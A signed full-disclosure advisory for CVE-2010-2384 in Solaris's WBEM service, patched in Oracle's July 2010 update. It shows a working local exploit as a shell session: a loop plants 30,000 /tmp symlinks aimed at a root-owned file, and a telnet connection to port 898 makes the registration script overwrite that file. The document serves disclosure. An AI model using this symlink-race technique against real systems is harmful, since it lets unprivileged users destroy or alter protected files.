-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Below is the full disclosure information for CVE-2010-2384. It was reported to security-alert@sun.com on 3 January, 2010 and assigned Sun bug 6913886. This vulnerability was addressed by Sun/Oracle in the July 2010 Critical Patch Update (http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html). - ------ When the wbem service is enabled but hasn't been used before, it will run /usr/sadm/lib/smc/prereg/SUNWrmui/SUNWrmui_reg.sh which can be exploited by an unprivileged local user like this: $ id uid=101(fstuart) gid=14(sysadmin) $ cd /tmp $ x=0 $ while [ "$x" -ne 30000 ] ;do > ln -s /etc/important /tmp/dummy.$x > x=$(expr "$x" + 1) > done $ ls -dl /etc/important -rw-r--r-- 1 root root 38 Jan 3 22:43 /etc/important $ cat /etc/important This is an important file! EOF $ telnet localhost 898 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. ^] telnet> quit Connection to localhost closed. $ cat /etc/important /<\/Scope>/ { n i\ \ SUNWrmui Bootstrap Folder \ This a temporary folder to workaround a bug. It should be deleted during install. But if you do see it in the toolbox editor, do NOT delete it. \ status_16.gif \ status_32.gif \ } SUNWrmui_reg.sh also uses /tmp/this_computer.$$ which can also be exploited. - ------ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTEUMPmKGA6cQSpZSAQJXogf+PNSJwfSchgycCWHVpqknVm4KKJ1s/m0y SWmbzxkoTuKR3hrW7cAPbUb2RHU92Ew587/uPIXhpUCaTrYImJUU9EYHoo132ZpL KNEXQeqzMi2qaxQU6mkQBEA9Qc3VDh0kDcbDPjPJKShqb2k84CBq6ni39vb1zRlY SVMldGCS5XflnjtINiwzdmnjNCVkMT4wtuFo3f2GhZaNKEOAKr2LVZT1KkYA6fmY a6E5XFisQPBbVSPhN82ed7v73GTe5o09SDN3bHozV7x2ki4vxjCFau/hGG/NVNVD NddIRtqVu8uodrI5hyt1gNXtTV9rT40GiAyOA1iuQHM7FmB8SXKI8w== =8592 -----END PGP SIGNATURE-----